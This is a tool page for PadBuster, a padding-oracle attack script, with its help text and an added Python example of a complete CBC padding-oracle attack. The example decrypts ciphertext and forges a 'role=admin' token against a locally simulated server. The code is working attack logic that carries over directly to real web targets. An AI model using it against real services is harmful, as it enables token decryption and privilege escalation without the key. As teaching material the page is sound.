PadBuster is a Perl script for automating padding oracle attacks. PadBuster provides the ability to decrypt arbitrary ciphertext, encrypt arbitrary plaintext, and perform automated response analysis to determine whether a request is vulnerable to a padding oracle attack. The only thing the attack needs from the target is a response that distinguishes a padding failure from any other failure (an error string, a different response body, or another observable difference); the -error and -usebody options below are how PadBuster is told what that difference looks like. Source:

PadBuster homepage | Kali PadBuster repo

  • Author: Brian Holyfield, Gotham Digital Science
  • License: Reciprocal Public License 1.5

    0x01 Tools included in the padbuster package

    padbuster - Script for performing padding oracle attacks

    :~# padbuster
    | PadBuster - v0.3.3                        |
    | Brian Holyfield - Gotham Digital Science  |
      Use: URL EncryptedSample BlockSize [options]
    Where: URL = The target URL (and query string if applicable)
           EncryptedSample = The encrypted value you want to test. Must
                             also be present in the URL, PostData or a Cookie
           BlockSize = The block size being used by the algorithm
       -auth [username:password]: HTTP Basic Authentication
       -bruteforce: Perform brute force against the first block
       -ciphertext [Bytes]: CipherText for Intermediate Bytes (Hex-Encoded)
       -cookies [HTTP Cookies]: Cookies (name1=value1; name2=value2)
       -encoding [0-4]: Encoding Format of Sample (Default 0)
                        0=Base64, 1=Lower HEX, 2=Upper HEX
                        3=.NET UrlToken, 4=WebSafe Base64
       -encodedtext [Encoded String]: Data to Encrypt (Encoded)
       -error [Error String]: Padding Error Message
       -headers [HTTP Headers]: Custom Headers (name1::value1;name2::value2)
       -interactive: Prompt for confirmation on decrypted bytes
       -intermediate [Bytes]: Intermediate Bytes for CipherText (Hex-Encoded)
       -log: Generate log files (creates folder PadBuster.DDMMYY)
       -noencode: Do not URL-encode the payload (encoded by default)
       -noiv: Sample does not include IV (decrypt first block)
       -plaintext [String]: Plain-Text to Encrypt
       -post [Post Data]: HTTP Post Data String
       -prefix [Prefix]: Prefix bytes to append to each sample (Encoded)
       -proxy [address:port]: Use HTTP/S Proxy
       -proxyauth [username:password]: Proxy Authentication
       -resume [Block Number]: Resume at this block number
       -usebody: Use response body content for response analysis phase
       -verbose: Be Verbose
       -veryverbose: Be Very Verbose (Debug Only)

    0x02 padbuster usage examples

    :~# coming soon
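    The two capabilities described at the top of the page, decrypting a ciphertext and encrypting a chosen plaintext using nothing but a padding oracle, as an added worked example that is not part of PadBuster or of this page. It runs against a locally simulated server instead of an HTTP endpoint, uses a stand-in Feistel block cipher rather than AES so it has no third-party dependencies, and the names padding_oracle, recover_intermediate, oracle_decrypt and oracle_encrypt are this example's own.

```python
"""Worked CBC padding-oracle attack on a locally simulated target: decrypt without
the key, then forge ciphertext for chosen plaintext (what PadBuster automates)."""
import hashlib
import os

BLOCK = 16
KEY = os.urandom(16)  # constructed server secret; the attack code never reads it


def _round(key, i, half):
    return hashlib.sha256(key + bytes([i]) + half).digest()[:8]


def block_encrypt(key, block):
    """Stand-in 16-byte block cipher (4-round Feistel over SHA-256), NOT AES: the
    attack only needs some keyed permutation. Swap in AES-ECB for a real target."""
    l, r = block[:8], block[8:]
    for i in range(4):
        l, r = r, bytes(a ^ b for a, b in zip(l, _round(key, i, r)))
    return l + r


def block_decrypt(key, block):
    l, r = block[:8], block[8:]
    for i in reversed(range(4)):
        l, r = bytes(a ^ b for a, b in zip(r, _round(key, i, l))), l
    return l + r


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def blocks(data):
    return [data[i:i + BLOCK] for i in range(0, len(data), BLOCK)]


def pad(data):  # PKCS#7
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n


def unpad(data):
    n = data[-1]
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")  # this is the distinction the oracle leaks
    return data[:-n]


def cbc_encrypt(key, iv, plaintext):
    out, prev = [iv], iv
    for p in blocks(pad(plaintext)):
        prev = block_encrypt(key, xor(p, prev))
        out.append(prev)
    return b"".join(out)  # IV || ciphertext


def cbc_decrypt(key, data):
    bs = blocks(data)
    return unpad(b"".join(xor(block_decrypt(key, c), p) for p, c in zip(bs, bs[1:])))


def padding_oracle(data):
    """Simulated vulnerable server: answers only 'padding valid?' (the signal
    PadBuster extracts from a real target with -error or -usebody)."""
    try:
        cbc_decrypt(KEY, data)
        return True
    except ValueError:
        return False


def recover_intermediate(oracle, target):
    """Learn D_key(target) one byte at a time, last byte first, from oracle answers."""
    inter = bytearray(BLOCK)
    for pos in range(BLOCK - 1, -1, -1):
        padv = BLOCK - pos
        crafted = bytearray(BLOCK)
        for i in range(pos + 1, BLOCK):
            crafted[i] = inter[i] ^ padv  # force the already-known tail to padv
        for guess in range(256):
            crafted[pos] = guess
            if not oracle(bytes(crafted) + target):
                continue
            if pos == BLOCK - 1:
                # A 0x01 hit may really be 0x02 0x02 (etc.): disturb the byte to the
                # left; genuine 0x01 padding still validates, a false hit does not.
                probe = bytearray(crafted)
                probe[pos - 1] ^= 0xFF
                if not oracle(bytes(probe) + target):
                    continue
            inter[pos] = guess ^ padv
            break
        else:
            raise RuntimeError("no valid padding found at byte %d" % pos)
    return bytes(inter)


def oracle_decrypt(oracle, data):
    """PadBuster's default mode: plaintext from IV || ciphertext, no key needed."""
    bs = blocks(data)
    return unpad(b"".join(xor(recover_intermediate(oracle, c), p) for p, c in zip(bs, bs[1:])))


def oracle_encrypt(oracle, plaintext):
    """PadBuster's -plaintext mode: pick an arbitrary last block, learn its
    intermediate state, set the preceding block so the XOR gives the wanted
    plaintext, and repeat backwards until the IV is produced."""
    chain = [bytes(BLOCK)]
    for p in reversed(blocks(pad(plaintext))):
        chain.insert(0, xor(recover_intermediate(oracle, chain[0]), p))
    return b"".join(chain)


if __name__ == "__main__":
    token = cbc_encrypt(KEY, os.urandom(16), b"user=alice;role=guest")  # constructed
    print(oracle_decrypt(padding_oracle, token))
    print(cbc_decrypt(KEY, oracle_encrypt(padding_oracle, b"user=alice;role=admin")))
```

    Against a real target PadBuster does the same work over HTTP: the URL, the encoded sample and the block size are the three positional arguments, -encoding matches how the sample is encoded, -error (or -usebody) tells it how to recognise the padding-failure response that padding_oracle returns False for here, and -plaintext switches to the forging mode shown by oracle_encrypt. The check on the last byte in recover_intermediate is the one edge case a hand-rolled script usually gets wrong: a valid-padding answer for the final byte can be caused by 0x02 0x02 rather than 0x01, and without the extra probe the whole block comes out wrong.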
